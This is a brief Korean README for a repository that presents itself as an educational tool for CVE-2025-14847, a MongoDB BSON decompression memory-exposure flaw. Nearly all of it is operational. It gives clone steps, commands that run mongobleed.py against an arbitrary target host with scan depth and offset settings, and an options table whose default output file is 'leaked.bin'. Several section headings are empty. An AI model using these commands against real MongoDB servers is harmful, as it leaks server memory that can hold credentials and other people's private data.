
이 저장소는 MongoDB의 BSON 압축 해제 구현에서 발견된 중요한 취약점인 CVE-2025-14847의 메모리 안전 개념을 시연하도록 설계된 교육용 연구 도구를 포함합니다. 이 도구는 압축 해제 중 부적절한 경계 검사가 메모리 노출로 이어질 수 있는 방식을 시뮬레이션합니다.
이 도구는 다음을 시연합니다:
사전 요구 사항
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# 기본 스캔(오프셋 20-8192)
python3 mongobleed.py --host <target>
# 더 많은 데이터를 위한 심층 스캔
python3 mongobleed.py --host <target> --max-offset 50000
# 사용자 지정 범위
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
이 취약점은 데이터베이스 보안의 광범위한 문제를 부각합니다:
공식 자료:
| Option | Default | Description |
|---|
--host | localhost | 대상 MongoDB 호스트 |
--port | 27017 | 대상 MongoDB 포트 |
--min-offset | 20 | 프로브할 최소 문서 길이 |
--max-offset | 8192 | 프로브할 최대 문서 길이 |
--output | leaked.bin | 유출된 데이터 출력 파일 |